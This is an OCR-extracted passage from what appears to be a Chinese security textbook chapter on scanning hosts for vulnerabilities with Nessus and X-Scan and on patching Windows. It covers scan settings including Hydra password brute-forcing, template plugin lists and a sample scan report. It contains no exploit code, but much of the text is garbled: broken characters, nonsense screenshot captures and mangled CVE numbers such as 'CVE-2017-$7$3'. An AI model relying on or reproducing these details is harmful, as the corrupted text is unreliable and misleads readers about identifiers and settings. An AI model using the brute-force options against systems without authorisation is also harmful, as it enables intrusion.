选择 服务 发 现 选项 ， 探 测 所 有 端口 以 
查找 服务 ， 尝 试 将 每 个 开放 端口 映射 到 该 
端口 上 运行 的 服务 ， 如 下 图 所 示 。 


General Settings 


w Probe all ports to find services 


注意 ， 在 一 些 罕 见 的 情况 下 ， 这 可 
会 中 断 一 些 服务 ， 并 导致 不 可 预见 的 副 
作用 。 
搜索 SSL/TLS 服 务 界面 ， 默 认为 打开 
状态 ， 可 以 选择 只 搜索 SSL/TLS 服 务 ， 或 搜 
索 所 有 端口 ， 识 别 是 否 有 快 过 期 的 证 书 ， 
默认 选择 枚 举 所 有 SSL/TLS 密 码 ， 居 用 CRL 
检查 (连接 到 Internet) ， 如 下 图 所 示 。 


Search forSSLTLS services De 


Search for SSULTLS on Known SSUTLS ports 


Known SSUTLS ports 


Identify certificates expiring within 
All ports 


w Enumerate all SSLTLS ciphers 


Enable CRL checking (connects to the Internet) 


FE | 


EC 
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在 Accuracy 界 面 中 可 以 进行 准确 性 设 
置 和 执行 彻底 扫描 ， 其 中 准确 性 有 两 项 可 
选 ， 第 1 项 避免 可 能 存在 的 虚假 报警 ， 第 2 
项 显示 出 可 能 存在 的 虚假 报警 ， 执 行 彻 底 
的 测试 ， 这 个 存在 一 定 风 险 ， 可 能 破坏 网 
络 或 影响 扫描 速度 ， 如 下 图 所 示 。 


Accuracy 


Override normal accuracy 


| tential 1al: lam 


Periorm thorough tests (may disrupt your network or impact scan speed) 


在 Antivirus 与 SMTP 界 面 中 ， 可 以 对 
反 病 毒 定义 宽 限 期 (以 天 计 ) ， 可 以 对 邮件 
设置 域名 、 服 务 器 地 址 等 ， 如 下 图 所 示 。 


Antivirus 


Antivirus definition grace period (in days)}: 0 了 


SMTP 


Third party domain example.com 


From address nobody@example.com 


To address postmaster@[AUTO_REPLACED IP] 


在 General Settings 与 Oracle Database 
设置 界面 中 ， 可 以 设置 用 户 默 认 提 供 的 赁 
证 ， 如 果 用 户 的 密码 策略 设置 为 在 多 次 无 
效 党 试 后 锁定 账户 ， 则 用 于 防止 账户 锁 
定 ， 使 用 Oracle 数 据 库 测试 默认 账 尸 可 能 会 
比较 慢 ， 如 果 有 需要 也 可 以 选择 ， 如 下 图 
所 示 。 


General Settings 


v Only usecredentials provided by the user 


Dracle Database 


Test default accounts (slow) 


(人 多 提示 : Nessus 启 用 了 Hydra (在 线 密码 


破解 ) 工具 配合 生成 冤 码 规则 ， 如 下 图 所 
示 。 这 里 可 以 村 入 登录 账 与 文件 ， 和 登录 窗 
码 文件 等 ， 并 设置 并 行 任务 数量 、 超 时 时 
间 、 尝 试 空 密码 、 尝 试 以 密码 登录 、 在 第 
一 次 成 功 后 停止 暴力 强迫 、 测 试 默 认 账 户 
等 参数 。 
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Fyara 


NostgreS QL catabnse name 


全 注意 : Nessus 还 具有 其 他 高 级 扫描 设置 
选项 ， 这 里 不 再 详细 介绍 ， 用 户 可 以 自行 
安装 该 软件 后 ， 然 后 打开 该 软件 的 设置 界 
面 ， 从 中 学 习 各 个 设置 选项 的 作用 。 


12.5.4 其 他 扫 摘 项 


Nessus 除 了 提供 高 级 扫 拉 以外， 还 设置 
了 一 些 其 他 个 性 扫描 ， 这 些 个 性 扫描 有 的 
是 针对 特殊 漏洞 ， 有 的 是 针对 不 同 设备 。 


1. Balock Detection 漏 洞 


Badlock Detection 是 一 种 “协议 /中 间 
人 ”攻击 漏洞 ， 可 用 模拟 Windows AD 〈 通 
过 批量 创建 和 编辑 用 户 账 户 ， 指 派 管理 权 
限 等 ) 己 验 证 的 用 户 喘 份 发 动 攻击 。 在 此 
种 攻击 中 ， 攻 击 者 可 被 授予 读 写 SAM 数 
据 库 的 权限 ， 可 能 造成 所 有 用 户 名 密码 和 
其 他 潜在 敏感 信息 泄露 。 漏 洞 编号 CVE- 
2016-2118 和 CVE-2016-0128， 在 Nessus 扫 
描 模 板 中 图 标 如 下 图 所 示 。 


更 


Badlock Detection 


针对 Badlock Detection 漏 洞 ，Nessus 提 
供 的 扫描 插件 ， 如 下 图 所 示 ， 这 里 只 列 出 
了 部 分 ， 具 体 请 参考 软件 本 身 ， 其 他 扫描 
类 型 的 插件 也 同样 截取 部 分 。 
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Settings Credentlals plugins 所 
PLUGIN FAMILY ， TOTAL PLUGIN NAME 
CenmtDS Local Security Checks < CentOS 5 ; samba (CESA-2016;0621) (Badlock) 
FreeBSD Local Secunty Checks 1 CentOS 5 : 5amba3x (CESA-2016:0613) (Badlock) 
General 1 CentOS 6 /7 :ipar libldb / libtalloc / libtdb / libtevent / openchange ' samba... 
Misc 1 CentOS 6 : samba [CESA-2016:0611) (Badlock) 
Oracle Linux Local Security Checks 一 


Red Hat Local Securnty Checks 
Scientific Linux Local Security Checks a 


Windows 1 


2. Bash Shellshock Detection 涯 洞 


PLUGIN ID 记 
90452 
90451 
90450 


90449 


Bash Shellshock Detection 漏洞， 又 称 为 破 这 漏洞 ， 会 影响 目前 主流 的 Linux 和 Mac OSX 


操作 系统 平台 。 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


" 


Bash Shellshock Detection 


针对 破 过 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Debian Local Security Checks 
Fedora Local Security Checks 


FreeBSD Local Security Checks 


FTP - 
Gain a shell remotely ad 
General 1 


Settings Credentlals Pluglns < 
入 和 
PLUGIN FAMILY TOTAL PLUGIN NAME PLUGIN ID 
CenmtDS Local Security Checks 2 CentOS 51617 :bash (CESA-2014:1293) (Shellshock) 77835 
CGI abuses 2 CentOS 51617 :bash (CESA-2014:1306) 77879 


3. Basic Network Scan 


Basic Network Scan， 基 础 网 络 设备 扫描 。 这 里 针对 基础 网 络 设备 ， 比 如 Windows 系 


统 、Linux 系 统 、 路 由 器 、 交 换 机 等 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


NN 


Basic Network Scan 


针对 基础 网 络 设 备 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Settings Credentials Plugins 宝 

PLUGIN FAMILY , TOTAL PLUGIN NAME PLUGIN ID 
AIX Local Securlty Checks 11334 | 2X ApplicatlonServer Tux System ActiveX ExportSettings() Method Arbltrary... 58484 
Amazon Linux Local Security Checks 1154 2X Client TuxClientSystem Activex InstallClient() Method Arbitrary MS| Pa... 58321 
Backdoors 114 3CTttpSvc Long Transport Mode Remote Overflow 23735 
Brute force attacks 26 30-FTP Multiple Directory Traversal Vulnerablilities 33218 
CentOSsS Local Security Checks 2668 3DGreetings Player ActveX Multiple Butfer Overfliows 26020 
Cel abuses 2934 3vx MPEG-4 < 5.0.2 Buifer Overflow 29749 
Cel abuses : XSS 669 7-Zip< 16.00 Multiple Vulnerabilities 91230 
CISCO S62 7-Zip < 16.03 NULL Pointer Dereference DoS 109799 


4. Credenticled Patch Audit 


Credenticled Patch Audit， 补 丁 扫 描 。 主 要 是 针对 不 同 设备 更 新 补丁 的 一 个 扫描 ， 在 
Nessus 扫 摘 模 板 中 的 图 标 如 下 图 所 示 。 


Credentialed Patch Audit 


针对 网 络 设 备 补丁 扫描 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credentials Plugins < 
PLUGIN FAMILY ， TOTAL PLUGIN NAME PLUGIN ID 
AIX Local Securlty Checks 11334 AIX 5.1 7 IY19744 22372 
Amazon Linux Local Security Checks 1154 AIX 5.1 : IY20496 22373 
CentOsS Local Security Checks 2668 AIX 5.1 : IY21309 22374 
CISCO 962 AIX 5.1 : IY22266 22375 
Databases 595 AIX 5.1 : IY22268 22376 
Debian Local Security Checks 5822 AIX 5.1 : IY23041 22377 
F5 Networks Local Security Checks 716 AIX 5.1 : IY23846 22379 
Fedora Local Security Checks 12861 AIX 5.1 : IY23847 22379 


5. Intel AMT Security Bypass 


Intel AMT Security Bypass 针 对 Intel 一 球 远 超 控制 功能 的 心 片 漏洞 扫描 ， 在 Nessus 扫 描 
模板 中 的 图 标 如 下 图 所 示 。 


Intel AMT Security Bypass 


针对 Itel 心 片 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


234 


第 12 章 ”无线 网 络 中 主机 漏洞 的 安全 防护 


Settings Credentials Plugins 


PLUGIN FAMILY 
Settings 
Web Servers 


Windows 


TOTAL 


PLUGIN NAME 
Intel Management Engine Authenticatlon Bypass (INTEL-SA-00075) (remote... 


Intel Management Engine Irsecure Read / Wiite Operations RCE (INTEL-S... 


PLUGIN ID 


97999 


97998 


6. Malware Scan 


Malware Scan， 恶 意 软 件 扫描 。 该 功能 主要 是 用 于 对 已 知 恶 意 软 件 添 加 特征 ， 通 过 这 些 


特征 比 对 判断 目标 主机 是 否 存在 相应 恶意 软件 ， 在 Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


Y 


Malware Scan 


针对 恶意 软件 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


PLUGIN FANMILY 


Backdoors 


General 


MacOSsS X Local Security Checks 


Misc. 


Settings 


Web Servers 


Windows 


Windows : User management 


Settings Credentials Plugins 定 


PLUGIN NAME 
4553 Paraslte Mothersnp Backdoor Deatection 
Agobot.FO Backdoor Deteciion 
aya.cg CGl Backdoor Detection 
Arugizer Backdoor Detection 
ASUS Router infosvr Remcte Command Execution 
BackOrifice Software Detection 
Bagle Worm Removal 


Bagle.B Worm Detection 


PLUGIN ID 


JILI1LS7 


12128 


11118 


7. Shadow Brokers Scan 


Shadow Brokers Scan， 代 理 漏洞 扫描 。 该 扫描 主要 针对 本 地 或 远程 代理 存在 的 漏洞 ， 
在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


Shadow Brokers Scan 


针对 代理 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Settings Credentials Plugins 


PLUGIN FAMILY 

centOs Local Seculrlty Checks 
CGI abuses 

ClISCDO 

Debian Local Security Checks 
Fedora Local Securlty Checks 
Firewalls 

FreeBSD Local Security Checks 


FTP 


TOTAL PLUGIN NAME 
7 | CenNntOS 3/4:Kkermal (CESA-2005:356) 


CentOS 3/4.:php (CESA-2005:564) 


CentOS 314: 


sdquirrelmail ICESA-2006:0668) 


1 CentOS 3 : kemel (CESA-2005:293) 


卫 CentOS 4 : kemel (CESA-2006:0574) 


1 CentOS 4 : kemel (CESA-2009:1223) 


CentOS 5 : kemel (CESA-2009:1222) 


PLUGIN ID 


8. Spectre and Meltdown 漏 洞 


Spectre and Meltdown 漏 洞 ， 幽 灵 与 熔断 漏洞 ， 必 片 级 安全 漏洞 。Spectre 中 文 名 “ 幽 
灵 ”， 有 CVE-2017-$7$3 和 CVE-2017-$715$ 两 个 变 体 ，Meltdown 中 文 名 “熔断 ”， 有 CVE- 


2017-5754 一 个 变 体 ， 在 Nessus 扫 描 模 板 中 的 图 标 如 下 图 所 示 。 


Ry 


Spectre and Meltdown 


针对 幽灵 与 熔断 漏洞 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credentials Plugins 


PLUGIN FAMILY 

AIX Local Security Checks 

Amazon Linux Local Securily Checks 
CentOS Local Security Checks 
Debian Local Security Checks 
Fedora Local Securlty Checks 
Firewalls 

FreeBSD Local Security Checks 


General 


TOTAL ~ PLUGIN NAME 

7 AIX 5.3 TL 12 

3 AX 61TL9 

12 AIX 7.1TL4: 
AlIX ?7.11L5 

1 AIX 7T.2TLO0 

1 AIX 7.2TL1 

79 


: Spectre meltdown (1J03029) (Meltdown) (Spectre) 
spectre_imeltdown (0J03030) (Melidown) (Spectre)} 
spectre_meltdown (J03032) (Meltdown) (Spectre) 
: spectre_meltdown (J03033) (Meltdown) (Spectre) 
) : spectre_meltdown (J03034) (Meltdown) (Spectre) 
spectre_imeltdown (J03035) (Melidown) (Spectre) 


2 : spectre_meltdown (J03036) (Meltdown) (Spectre) 


PLUGIN ID 


106310 


106311 


9. WannaCry Ransomware 


WannaCry Ransomware， 勒 索 病毒 扫描 。 该 扫描 主要 针对 永恒 之 蓝 勒 索 类 病毒 的 一 个 
扫描 ， 可 以 选择 提供 Windows 账 号 密码 ， 这 样 通过 WMI 进 行 测试 ， 列 举 存 在 哪些 软件 更 


新 ， 在 Nessus 扫 描 模板 中 的 图 标 如 下 图 所 示 。 


WannaCry Ransomware 


针对 勒索 病毒 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 
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Settlngs Credenilals Pluglns ~- 
PLUGIN FAMILY ， 
Settings 
Windows 


Windows : Microscoft Bulletins 


TOTAL PLUGIN NAME 

1 Malicious Process Detection 

4 MS17-010: Secunty Update for Microsott Windows SMB Server (4013389) (... 
| Server Message Block [SM3) Protocol Version 1 Enabled 


SMB Server DOUBLEPULSAR Backdoor / Implant Detection (Eternal Rocks) 


PLUGIN ID 


59275 


97833 


97086 


99439 


10. Web Application Tests 


Web Application Tests，Web 应 用 渗透 扫描 。 该 扫 摘 主要 针对 网 络 应 用 的 渗透 测试 ， 在 
Nessus 扫 擅 模板 中 的 图 标 如 下 图 所 示 。 


Web Application Tests 


针对 网 络 应 用 渗透 Nessus 提 供 的 扫描 插件 ， 如 下 图 所 示 。 


Settings Credentlals Pluglns 所 


PLUGIN FAMILY ，。 
CGI abuses 

CGI abuses : XSS 
Settings 


Web Servers 


TOTAL 站 PLUGIN NAME 

<934 bash_history Files Disclosed via Web Server 

669 -SVIVentries Disclosed via Web Server 

2 2BGal disp_album.php id_album Parameter SQL Iniection 
1108 3Com Network Supervisor Traversal Arbitrary File Acctess 


3Com Web Management Interface Default Credentials 
4D Webs TAR Tomcat Plugln Remote Bufier Overtlow 
4limages <= 1.7.1 index.php template Parameter Traversal Local File Inclusi... 


@lex Guestbook livre_include.php chem_absolu Parameter Remote File Inc.. 


PLUGIN ID 


83346 


33821 


16046 


19939 


73190 


18212 


21020 


14830 


12.5.5 ”开始 扫 摘 漏洞 


本 小 节 使 用 Nessus 从 创建 新 的 扫描 开始 ， 


创建 一 个 完整 的 扫描 需要 以 下 几 个 步 又 : 
[step 国 创建 新 的 扫描 ， 这 里 选择 高 级 扫描 项 ， 基 础 设置 中 输入 一 个 扫描 的 名 称 以 及 目标 地 


址 ， 如 下 图 所 示 。 


BASIC v 
General 
schedule 
Notifications 
DISCOVERY 
ASSESSMENT 
REPORT 


ADVANCED 


Complance Plugins 
Name WindowXP 
Description 
Folder My Scans “ 
Targets 192.168.1103 


建立 一 个 完整 的 扫描 直到 最 后 的 漏洞 报告 。 
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这 里 以 Windows XP 系 统 来 测试 ， 在 凭证 中 选择 Windows 输 入 一 个 账号 密码 ， 如 下 图 
所 示 ， 这 样 Nessus 会 登录 到 系统 提供 更 全 面 的 一 个 扫描 ， 其 中 也 包括 勒索 病毒 扫描 。 如 果 
是 在 Linux 系 统 下 选择 SSH，Nessus 还 支持 其 他 更 多 的 登录 ， 如 邮件 服务 器 、 数 据 库 等 会 根 


据 实 际 需 要 添加 凭证。 


Settings Credentials Compliance Plugins 
H v Window 

Authentication method Password v 

SNMPv3 
Usemame 

SSH 

Windows Passwor 
Domain 


添加 完 账号 后 下 方 有 一 个 全 局 设置 ， 
其 中 包括 4 项 ， 如 右 图 所 示 。 

(1) 不 以 明文 的 方式 传输 账号 密码 ， 
避免 因为 网 络 噢 探 造 成 账号 窗 码 泄露 。 

(2) 不 以 NTLMV1 的 方式 验证 默认 ， 
会 使 用 v2 的 方式 验证 。 

(3) 开启 远程 注册 表 扫 描 ， 扫 描 结 束 
后 会 自动 关闭 。 

(4) 在 扫描 期 间 开 局 网 络 共 享 扫描 ， 
扫描 结束 后 会 自动 关闭 。 


Settings Credentials Compliance 


Windows 


DISA Windows Server 2008 MS STIG v6r41 
DISA Windows Sefver 2008 R2 DC STIG ... 
DISA Windows Server 2008 R2 MS STIG ... 
DISA Windows Server 2012 and 2012 32 ... 
DISA Windows Server 2012 and 2012 32 .., 
DISA Windows Server 2016 STIG v1r5 


| save | -| 


Cancel 


选择 完成 后 单 击 Save 按 钮 ， 将 所 有 的 设置 保存 ， 


务 ， 如 下 图 所 示 。 


Global Credential Settings 


ww Never send credentials in the clear 

ww Do not Use NTLMV1 authentication 

ww Star the Remote Registry service during the Scan 
w Enable administrative shares during the Scan 
合 规 性 设置 ， 如 果 已 知 目标 主机 操作 
系统 类 型 ， 可 以 从 这 里 进行 设置 ， 还 可 以 
选择 不 同 的 应 用 ， 这 里 选择 Windows XP 系 
统 ， 如 下 图 所 示 。 


Plugins 


CIS Windows XP v3.1 


在 扫描 中 可 以 看 到 新 创建 的 扫描 任 


My Scans 
Name schedule 
WindowXP On Demand 


Import 


Last Modified 


Today at 3:12 AM 


如 果 不 需 要 定时 任务 ， 
启动 打 描 ， 如 下 图 所 示 。 
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Last Modified Y 


人 Today at 3:29 AM 


[step 园 扫描 完成 后 ， 可 以 单 击 该 扫描 项 跳 转 到 扫描 结果 页 面 ， 如 下 图 所 示 。 这 里 会 列 出 详 
细 的 扫描 信息 ， 并 且 以 不 同 颜色 标注 出 各 种 威胁 程度 的 漏洞 数量 。 


Hosts 2 Vulnerabilities 22 History 2 
Filter ™ 


Host Vulnerabilities Y 


1021681102 LI : 站 全 村 


Status: Completed 
policy: windos_tast 
Scanner: Local Scanner 
Start- Today at 3-23 AM 
En 小 Today at 325 AM 
Elapsed: 2 minutes 


Vulnerabiliues 


Critical 
区 Hilgn 
Medium 


Low 
In 各 


单 击 Export 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 可 以 选择 将 扫描 结果 以 哪 种 形式 
了 导出， 如 下 图 所 示 。 


Configure Audit Trail Launch Export 


PDF 
HTML 
CSV 


Nessus DB 


以 生成 PDF 格式 为 例 ， 生 成 的 扫描 报告 如 下 图 所 示 。 这 里 会 列 出 每 一 种 漏洞 的 详细 
说 明 ， 以 及 修补 方法 。 


192.168.1.102 


= 
己 
[es 


MSO8-067: Microsoft Windows Server Service Crafted RPC Request 
Handling Remote Code Execution (958644) (ECLIPSEDWING) 
(uncredentialed check) 


ja 
S 
© 


MSO9-001: Microsoft Windows SMB Vulnerabilties Remote Code Execution 
(958687) (uncradentialed check) 


— 
S 
So 


MS17-010: Security Update for Microsoft Windows SMB Server (4013389) 
(ETERNALBLUE) (ETERNALCHAMPION) (ETER NALROMANCE) 
(ETERNALSYNERGY) (WannaCry) (Eternal Rocks) (Petya) (uncredentialed 
check) 


[™ 
[ew 


73182 Microsoft Windows XP Unsupported Installation Detection 


上 
己 
己 


108797 Unsupported Windows OS 


bd 
© 


26920 Microsoft Windows SMB NULL Session Authentication 


57608 SMB Signing not required 


E 


21745 Authentication Failure - Local Checks Not Run 


104410 Authentication Faiure(s) for Provided Credentials 


z 
> 


45590 Common Platform Enumeration (CPE) 


E 


54615 Device Type 


E 


35716 Ethemet Card Manufacturer Detection 


E23 
Em 
[emmen | 
Ea 
E33 
BE 
Ee 0 
El 
区 一 测 
EH 
Ee 
EE 
EY 


< 
> 


86420 Ethemet MAC Addresses 
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二 ， 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


12.6 ”系统 漏 润 的 安全 防护 


RE 
| 
“ly 


> 2 、 < et - 


Windows 更 新 


你 的 设备 已 安 竺 母 新 的 更 新 。 上 次 检 井 时间; 昨天 10;42 


要 想 防 范 系 统 的 漏洞 ， 首 先 要 及 时 为 
系统 打 补 丁 ， 下 面 介绍 几 种 为 系统 打 补 丁 人 站 
的 方法 。 恢 乞 


将 下 载 并 自动 安装 可 用 更 新 ， 


12.6.1 及 时 更 新 系统 re et 


Windows 更 新 是 系统 上 自 带 的 用 于 检测 
最 新 系统 的 工具 ， 使 用 Windows 更 新 可 
以 下 载 并 安装 系统 更 新 ， 有 具体 的 操作 步骤 
如 下 。 
单 击 “开始 ”按钮 ， 在 打开 的 “ 开 
始 ” 菜 单列 表 中 选择 “设置 ”菜单 项 ， 如 


单 击 “检查 更 新 ”按钮 ， 即 可 开始 检 
查 网 上 是 否 存在 更 新 文件 ， 如 下 图 所 示 。 


下 图 所 示 。 i 
文件 资源 管理 器 Windows 更 新 
a 0 
恢复 正在 查 拒 有 关 峡 新 更 新 的 信息 四? 
© 加 
三 所 有 应 用 et 


上 QO 口 ] 


打开 “设置 ”窗口 ， 可 以 看 到 有 关系 
统 设置 的 相关 功能 ， 如 下 图 所 示 。 


[step 图 检查 完毕 后 ， 如 果 存 在 更 新 文件 ， 则 


[el 、 和 , 
i 会 弹出 下 图 所 示 的 信息 提示 ， 提 示 用 户 有 
可 用 更 新 ， 并 自动 开始 下 载 更 新 文件 。 
= EY < 站 -0 x 
网 吝 和 Itene 个 性 化 
i、 飞 行 本 式 、 节 寺 ， 庆 | 屏 、 天 色 ey WINDOVWS 更 新 
Windows 更 新 
包 AP ms 问 有 可 用 更 新 。 
帐户 时 间 和 语言 轻松 使 用 隐私 "适用 于 Windows 10 Version 1511 的 累积 台新 (KB3124262)。 
外 的 帧 户 、 记 子 痢 Bf 育 、 区 域 、 日 其 讲述 人 、 族 大福 、 珊 位 置 、 柜 机 
同步 设置 、 工 作 、 其 他 
于 详细 信息 
正在 准备 安装 更 新 703%6 
shy a we 正在 查找 有 关 最 新 更 新 的 信息 吗 ? 
了 解 更 多 信息 


[step 加 单 去 “更 新 和 安全 ”图 标 ， 打 开 “ 更 二 
新 和 安全 ”窗口 ， 选 择 “Windows 更 新 ” 选 
项 ， 如 下 图 所 示 。 
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下 载 完毕 后 ， 系 统 会 自动 安装 更 新 文 
安装 完毕 后 ， 会 弹出 下 图 所 示 的 信息 
提示 框 。 


f 和 竣 E 


篇” WINDOWS 更 灯 


已 为 你 安排 了 一 次 重启 


如 果 过 要 ， 你 可 以 Y 即 更 新 启动 ， 人 请 兢 保 在 计划 的 时 
辣 将 设备 授 迎 电学 。 朴 中 思 新 阳 大 小 避 抑 实 雪 一 澡 时 间 。 


(@) 设备 将 在 朵 车 时 重启 (月 天 3:30 似乎 合适 )。 


立即 融 新 司 动 


正在 吉 找 有 关 吕 新 更 新 的 信息 吗 ? 
了 解 更 多 位 尽 


单 击 “ 立 即 重新 启动 ”按钮 ， 即 重新 
Fn 重新 启动 完毕 后 ， 再 次 打开 
了 窗口 ， 在 其 中 可 以 看 到 

“你 的 设备 已 安装 最 新 的 更 新 …… ”信息 
提示 ， 如 下 图 所 示 。 


<《 证 二 
人 ee Er 
EB wo 
Windows Defender EE OE 
16:07 
恢复 检查 更 新 
激活 将 下 载 并 自动 安 萄 可 用 更 新 。 
针对 开发 人 员 正在 查找 有 关 季 新 更 新 的 们 忆 吗 ? 
了 解 更 例 信 息 
忘 级 选项 


单 击 “ 高 级 选项 ”按钮 ， 打 开 “ 高 级 
选项 ”设置 工作 界面 ， Pe be 
新 的 安装 方式 ， 如 下 图 所 示 。 

Er 0 


江 ? 。 高 级 选项 


请 选择 安装 更 新 的 方式 


We 
ruaraTrexe 了 。 我 们 梅 在 你 未 使 用 设 各 时 自动 更 思 启动 设备 。 更 新 交 不 会 通过 技 流 号 计 窒 的 
连 持 侣 能 会 收 区 ] 志 行 下 吉 . 


品 更 新 Windows 时 提供 其 他 Microsoft 产品 的 更 新 


中 | 推 返 升级 
了 解 详 组 信息 


得 内 更 新 历史 记录 


选择 如 何 提 供 更 新 


获取 Insider Preview 版 本 


成 为 第 一 批 鹏 淳 可 看 Windows 的 后 续 理 新 和 改进 并 提供 反 饰 的 人 员 之 一 ， 
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12.6.2 ”为 系统 漏洞 打 补 丁 


除 使 用 Windows 系 统 自 带 的 Windows Up- 
date 下 载 并 及 时 为 系统 修复 漏洞 外 ， 还 可 以 使 
用 第 三 方 软件 及 时 为 系统 下 载 并 安装 漏洞 补 
丁 ， 常 用 的 有 360 安 全 卫士 、 优 化 大 师 等 。 

使 用 360 安 全 卫士 修复 系统 漏洞 的 具体 
| 
双击 桌面 上 “360 安 全 卫士 ”图 标 ， 
“360 安 全 卫士 ”， 如 下 图 所 示 。 


已 11 天 没有 体检 , 建议 立即 体检 


1 © 


单 击 “系统 修复 ”按钮 ， 进 入 下 图 所 
让 如 下 图 所 示 。 


单 击 “全 面 修复 ”按钮 ，360 安 全 卫 
始 自 动 扫描 系统 中 存在 的 漏洞 ， 并 在 

下 面 的 界面 中 显示 出 来 ， 用 户 在 其 中 可 以 

ee had 


所持 已 完成 发现 潜在 危险 项 , 请 立即 修复 sr 


/npn 


TH 
好 跑 

1 
TE 
罗 引 
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单 击 “ 一 键 修复 ”按钮 ， 开 始 修复 系 
统 存在 的 漏洞 ， 如 下 图 所 示 。 


到 现 曙 体 纪 - 1 岗位 芝 若 册 可 丹 公 法/ 
K94467694 ”2018 通用 于 Adobe Rash Pleyer 区 2018 i 2 8 下 载 D3 
国 软件 你 复 - 5 顶 这 些 更 和 押 用 于 修 息 一 必 寺 
KR44615n6 - Mirrosccf Owtiook 2016 安全 更 C3 
K84022232 - Microsoft Olfxe 2016 空 全 更 新 (局 6 2AME nd 
KR4461478 . Micrasoft praject 2016 去 全 更 新 目 而 
KB4461504 sof Word 2016 安全 更 新 (.- 14 4 1 功 贡 做 各 
KB4461473 - Sinype fer Psines 万 去 会 面目 = 
修得 半 友 恒基 关 八 【 充 志 六 有 效 


修复 完成 后 ， 则 系统 漏洞 的 状态 变 为 
pr pe 


】 漏洞 修复 处 理 中 .… 


局 J . pa 
BE 
< § pe 和 0 on 


到 观 曙 体 秘 - 1 岗 这 此 括 采 可 能 : 局 电筒 ， 建 议 立时 柳 所 
K84467694 ”2018 适用 于 Adobe Flash Player ~- 忆 2015 1 2 E 
站 钦 件 修复 - 5 顶 更 新 用 于 修 怎 一 此 汽 行 4 王 吉 去 全 钙 注 这 | 
KR4461506 - Microcoft Outiook 2016 安全 更 .|[ l 门 志 济 25% 
KB4022232 - Microsoft Offxe 2016 空 全 更 新 (… 已 8 ' Y 竺 和 疗 下 载 
KR4461476 -Microsoft project 2016 去 全 更 新 局 8.11-1 22 SA 可 > 他 吕 


KB4461504 - Microsoft Word 2016 安全 更 新 (- 14 40 .aM 咎 兴修 和气 
KR4461473 - Sinype for psiness 2016 去 会 本 目 “> 


修得 关 碟 口 功 尖 人 信访 处 有 入 


12.7 实战 演练 


实战 演练 1 一 一 使 用 X-Scan 扫 描 系 统 


X-Scan 是 国内 最 著名 的 综合 扫描 器 之 
一 ， 它 可 以 扫描 出 操作 系统 类 型 及 版 本 、 
标准 端口 状态 及 端口 BANNER 信 息 、CGI 漏 
洞 、IIS 漏 洞 、RPC 漏 洞 等 信息 。 

扫 摘 系统 漏洞 的 操作 步骤 如 下 : 

在 “X-Scan v3.3 GUI” 主 窗口 中 单 
击 开始 扫描 图 标 欧 ， 即 可 进行 扫描 。 在 扫 
描 的 同时 显示 扫描 进程 和 扫描 所 得 到 的 信 
息 ， 如 下 图 所 示 。 
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鼎 y X-Scan v3.3 GUI 一 口 过 
文件 [V 设置 (W) 查 震 (X 工具 IY) Language 革 动 ( 忆 
上 || |b 有 加 | 加 | 国 省 


i a 


NX-Scar 
er Pi Ww. Eo 二 met 中 文 站 )，http :www. xfocus. orat 
在 


人 
i 1 


lcalhos 
得 二 于 :下 窟 :开放 服 务 ， 


7 Active/Maximum host thread: 1/10, Current/Maximum thread: 271 才 


在 扫描 完成 之 后 ， 即 可 看 到 HTMIL 格 
式 的 扫描 报告 。 在 其 中 既 可 看 到 活动 主机 IP 
地 址 、 存 在 的 系统 漏洞 和 其 他 安全 隐患 ， 还 
可 看 到 安全 隐患 的 解决 方 委 ， 如 下 图 所 示 。 


一 口 Xx 
请 fiey//Dy360 安 全 浏 喇 志 于 站 -| 疙 Xscan Report x nn 3 
| X-Scan 检测 报 吉 人 
| 丰 插 去 列 出 了 法 龙 测 主 项 的 件 拭 源 洞 信和 扎 , 请 拒 授 邱 示 情 息 芍 技 尘 内 雁 寺 行 相 慰 补 ， 允 过 基 加 X-5Can 翌 方 等 评 冻 日 
| 检测 结果 
专 活 主机 1 | 
洒洒 区 重 0 
敬 言 歼 量 0 
Bk 1 | 
主机 列表 
主机 恰 测 结果 | 
Jocalhest 发 现 安全 提示 
[mT] 
主机 分 析 : localhost 
| 主机 地 址 | 端口 /服务 服务 陋 洞 | 
localhost |microsoft-ds (445/tcp) 发 现实 全 扣 示 
| 安全 珀 洞 及 解决 方案 : localhost 
类 型 ”应 口 /服务 支 全 扬 酒 及 襄 决 方案 
提示 microsoft-ds 开放 了 脱 务 
(445/tcp) 
“microsof-d5 "卫生 可 能 二 行李 这 内 口 。 
NESSUS_ID ; 10330 | v 


在 “X-Scan v3.3 GUI” 主 窗口 中 切换 
到 “漏洞 信息 ”选项 卡 下 ， 即 可 看 到 存在 
漏洞 的 主机 信息 ， 如 下 图 所 示 。 

启 X-scanva3 GUI - 口 Xx 
了 芯 忻 [Vi 设 辕 (W) 言 喜 (X) 工 县 VY) Language 帮助 (Z 


本 国 当 | 回 


DB .loralhoct 


/Active/Maximum host thread: 1/10, Current/Maximum thread: 2/1 2 


实战 演练 2 一 一 使 用 个 令 扫 摘 并 修复 系统 


SFC 命 令 是 Windows 操 作 系 统 中 使 用 频 
率 比较 高 的 命令 ， 主 要 作用 是 扫描 所 有 受 
保护 的 系统 文件 并 完成 修复 工作 。 该 命令 
的 语法 格式 如 下 : 


SEC TSCANNORI TFSCANONCED TI/ 
SCANBOOT] [/REVERT] [/PURGECACHE] [/ 
CACHESIZE=x] 

各 个 参数 的 含义 如 下 : 


e /SCANNOW: 立即 扫描 所 有 受 保 护 
的 系统 文件 。 

e /SCANONCE: 下 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 

e /SCANBOOT: 每 次 启动 时 扫描 所 
有 受 保 护 的 系统 文件 。 
/REVERT: 将 扫描 返回 到 默认 设置 。 

e /PURGECACHE: 清除 文件 缓存 。 

